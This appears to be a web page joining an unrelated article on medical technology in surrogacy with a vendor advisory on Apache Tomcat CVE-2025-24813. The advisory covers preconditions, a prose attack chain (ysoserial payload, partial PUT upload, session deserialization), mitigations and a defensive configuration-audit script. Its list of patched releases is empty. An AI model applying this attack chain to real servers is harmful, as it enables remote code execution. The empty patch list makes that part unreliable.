    The first three months of the surrogacy process involve a rigorous schedule of paperwork, legal formalities, and medical exams, as stated by Elevate Baby. Medical technology has enhanced these early stages by providing sophisticated diagnostic tools and tests. Surrogate mothers undergo comprehensive health evaluations to ensure they are physically capable of carrying a pregnancy to term. This includes blood tests, ultrasounds, and other imaging techniques that offer detailed insights into their health status. These exams help identify any potential issues early on, ensuring a smooth and safe journey ahead.

    Facilitating Legal and Ethical Compliance

    Legal aspects are a critical component of the surrogacy process. The initial months also involve meticulous legal work to protect the rights and responsibilities of all parties. Medical technology aids in this by ensuring accurate and secure documentation. Digital contracts and electronic signatures have replaced traditional paperwork, making the process more efficient and less prone to errors. Secure online portals allow for the easy sharing and storage of legal documents, ensuring compliance with local regulations and ethical standards.

    Enhancing Fertility Treatments

    One of the most significant impacts of medical technology on surrogacy is in the realm of fertility treatments. In vitro fertilization (IVF) is a cornerstone of the surrogacy process, and advancements in this field have greatly improved success rates. Technologies such as preimplantation genetic testing (PGT) allow for the screening of embryos for genetic abnormalities before implantation. This increases the likelihood of a healthy pregnancy and reduces the risk of complications. Additionally, innovations in cryopreservation enable the freezing and storage of eggs, sperm, and embryos, providing greater flexibility and options for intended parents and surrogates.

    Monitoring Pregnancy and Health

    Throughout the surrogacy journey, continuous monitoring of the surrogate’s health is paramount. Modern medical technology offers a range of tools to track the progress of the pregnancy and ensure the well-being of both the surrogate and the developing baby. Regular ultrasounds, non-invasive prenatal testing (NIPT), and wearable health devices provide real-time data on the surrogate’s condition. This information allows healthcare providers to promptly address any concerns and make informed decisions to support a healthy pregnancy.

    Supporting Emotional Well-being

    The surrogacy process can be emotionally taxing for all involved. Medical technology also plays a role in supporting the mental health of surrogate mothers. Telemedicine and virtual counseling services offer accessible support, allowing surrogates to connect with mental health professionals from the comfort of their homes. These resources help surrogates manage stress, anxiety, and other emotional challenges, ensuring a positive and fulfilling experience.

    Post-Birth Care and Follow-Up

    After the birth of the child, medical technology continues to be essential. Surrogates receive comprehensive post-birth care to ensure their physical and emotional recovery. Regular follow-up visits and check-ups are facilitated by advanced medical scheduling systems and electronic health records, ensuring continuity of care. It is recommended that individuals visit a doctor at least once a year to maintain their overall health, and this applies to surrogate mothers as well. Annual check-ups help monitor long-term health outcomes and provide ongoing support.



    Source link

  • Apache Tomcat Remote Code Execution Vulnerability


    Apache Tomcat is a popular, open-source web server and servlet container maintained by the Apache Software Foundation. It provides a reliable and scalable environment for executing Java Servlets and serving web pages built using Java Server Pages (JSP). Frequently deployed in both development and production environments, Tomcat plays a crucial role in delivering dynamic Java-based web applications across various enterprise use cases.

    Recently, a critical security vulnerability identified as CVE-2025-24813 was discovered in Apache Tomcat. It stems from a flaw in the handling of partial file uploads and session file persistence, potentially allowing attackers to achieve remote code execution (RCE) under certain conditions. The issue arises from how Tomcat’s default servlet manages write operations combined with the deserialization logic for persisted session files.

    CVE-2025-24813

    Initially published in early March with a CVSS score of 5.5, the severity of CVE-2025-24813 was later reassessed and upgraded to 9.8 (High). Recognizing the potential impact of this flaw, the Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalogue, underscoring the urgency for affected organizations to patch their systems.

    CVE-2025-24813 is a critical vulnerability in Apache Tomcat that can lead to remote code execution (RCE) when specific server configurations are in place. The issue arises from how Tomcat handles partial PUT requests in conjunction with file-based session persistence.

    This issue becomes exploitable when the default servlet is explicitly configured with the ‘readonly’ parameter set to false — a setting that enables write operations such as HTTP PUT. By default, Tomcat sets ‘readonly’ to true, which restricts write access and helps mitigate risk. This parameter is defined in the web.xml configuration file, typically located in the conf/ directory of the Tomcat installation.

    When partial PUT support is also enabled (enabled by default), an attacker can exploit this behaviour to upload a crafted serialized payload, targeting a session file. If Tomcat is configured to persist session data to disk, the uploaded file may later be automatically deserialized by the server, resulting in attacker-controlled code execution.

    The vulnerability affects the following versions of Apache Tomcat:

    • 11.0.0‑M1 through 11.0.2
    • 10.1.0‑M1 through 10.1.34
    • 9.0.0‑M1 through 9.0.98

    Exploitation Prerequisites for CVE-2025-24813

    To exploit CVE-2025-24813, several server-side conditions must be in place. These prerequisites enable an attacker to craft a malicious PUT request that results in the deserialization of attacker-controlled data, potentially leading to remote code execution (RCE).

    The following conditions must be met:

    • The default servlet’s readonly attribute is set to false, permitting write access via HTTP PUT requests
    • Partial PUT functionality is enabled — i.e., Tomcat accepts the Content-Range header (enabled by default)
    • The application is configured to use Tomcat’s file-based session persistence mechanism

    Exploitation Flow

    The exploitation of CVE-2025-24813 involves a sequence of carefully crafted steps that take advantage of Tomcat’s handling of partial file uploads and session deserialization. The following outlines a typical attack chain under vulnerable conditions:

    Environment Setup: The target server must have ‘readonly’ parameter set to false for the default servlet, partial PUT support enabled, and file-based session persistence configured.

    Payload Generation: The attacker generates a malicious serialized object — typically using a tool like ysoserial — embedding a command that will execute upon deserialization.

    Payload Upload: The crafted payload is uploaded to the server via an HTTP PUT request with a Content-Range header. This simulates a partial upload and results in the creation of a session file on disk.

    Triggering Deserialization: A follow-up request is made to the application with the JSESSIONID set to the uploaded session file’s name. This causes Tomcat to deserialize the file, assuming it to be a legitimate session object.

    Code Execution: If a suitable deserialization gadget exists on the classpath, the payload is executed, leading to remote code execution under the privileges of the Tomcat process.

    Mitigation

    The recommended and most effective mitigation for CVE-2025-24813 is to upgrade Apache Tomcat to a version where the vulnerability has been addressed. This flaw is fully patched in the following Tomcat releases:

    These versions include enhancements to the handling of temporary files created via partial PUT requests, ensuring such files are not mistakenly deserialized as session objects — thereby preventing remote code execution.

    For environments where immediate upgrades are not possible, the following temporary mitigations can help reduce risk:

    • Keep the default servlet’s readonly parameter set to true, which prevents write operations via PUT requests. This is the default and recommended setting.
    • Disable support for partial PUT requests, especially if not used by the application. This can be achieved at the connector level or via upstream web server rules (e.g., Nginx or Apache HTTPD).
    • Avoid using file-based session persistence, particularly when writable paths overlap with session storage locations.
    • Review and sanitize the server classpath to remove unnecessary libraries such as commons-collections, which may introduce exploitable deserialization gadgets.
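As an added example (not Seqrite's or Tomcat's own code), the following Python audits three of the preconditions listed above against a deployment's version string, web.xml and context.xml: it reads the DefaultServlet's readonly init-param (absent means Tomcat's default of true), treats a PersistentManager backed by a FileStore as the file-based session persistence configuration (an assumption about how that persistence is expressed), and compares the version against the affected ranges listed above. The config fragments are constructed fixtures; partial PUT support is enabled by default and does not appear in these files, so it is not checked.

```python
"""Audit a Tomcat deployment for the CVE-2025-24813 preconditions listed
above. Added example with constructed config fragments; not Seqrite's or
Tomcat's code."""
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"
# Affected ranges exactly as given in the advisory text above (inclusive).
AFFECTED = [("11.0.0-M1", "11.0.2"), ("10.1.0-M1", "10.1.34"), ("9.0.0-M1", "9.0.98")]

# Constructed fixtures: a weak web.xml that opens PUT on the default servlet
# and a hardened copy that keeps Tomcat's default of readonly=true.
WEAK_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""
SAFE_WEB_XML = WEAK_WEB_XML.replace("<param-value>false</param-value>", "<param-value>true</param-value>")

# Constructed context.xml fragments: PersistentManager + FileStore is the
# file-based session persistence this check assumes; the safe one has no Manager.
WEAK_CONTEXT_XML = """<Context>
  <Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore" directory="sessions"/>
  </Manager>
</Context>"""
SAFE_CONTEXT_XML = "<Context/>"


def _local(tag: str) -> str:
    """Strip the XML namespace so web.xml parses with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem: ET.Element, name: str) -> str:
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""


def default_servlet_readonly(web_xml: str) -> bool:
    """Effective 'readonly' for the DefaultServlet. Tomcat's default is true,
    so a missing init-param (or no DefaultServlet block at all) counts as true."""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet" or _child_text(servlet, "servlet-class") != DEFAULT_SERVLET:
            continue
        for param in servlet:
            if _local(param.tag) == "init-param" and _child_text(param, "param-name") == "readonly":
                return _child_text(param, "param-value").lower() != "false"
    return True


def uses_file_session_store(context_xml: str) -> bool:
    """True when a PersistentManager is backed by a FileStore (assumed shape)."""
    root = ET.fromstring(context_xml)
    return any(store.get("className", "").endswith(".FileStore")
               for mgr in root.iter("Manager")
               if mgr.get("className", "").endswith(".PersistentManager")
               for store in mgr.iter("Store"))


def version_key(version: str) -> Tuple[int, int, int, int, int]:
    """Sortable key; milestones such as 9.0.0-M1 precede the final 9.0.0."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-M(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version string: {version!r}")
    major, minor, patch, milestone = m.groups()
    return (int(major), int(minor), int(patch), 0 if milestone else 1, int(milestone or 0))


def version_affected(version: str) -> bool:
    """True only for versions inside the ranges the advisory lists."""
    key = version_key(version)
    return any(version_key(lo) <= key <= version_key(hi) for lo, hi in AFFECTED)


def assess(version: str, web_xml: str, context_xml: str) -> List[str]:
    """Names of the satisfied preconditions. Partial PUT support is enabled
    by default and is not expressed in these files, so it is not checked."""
    findings = []
    if version_affected(version):
        findings.append("affected version")
    if not default_servlet_readonly(web_xml):
        findings.append("readonly=false")
    if uses_file_session_store(context_xml):
        findings.append("file-based session persistence")
    return findings


if __name__ == "__main__":
    print("weak:", assess("9.0.98", WEAK_WEB_XML, WEAK_CONTEXT_XML))
    print("hardened:", assess("9.0.98", SAFE_WEB_XML, SAFE_CONTEXT_XML))
```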

    Seqrite Endpoint Protection

    All Seqrite customers are protected from this vulnerability by the following signatures:

    • HTTP/CVE-2025-24813!VS.49414

    Authors:

    Vinay Kumar

    Vineet Sarote



    Source link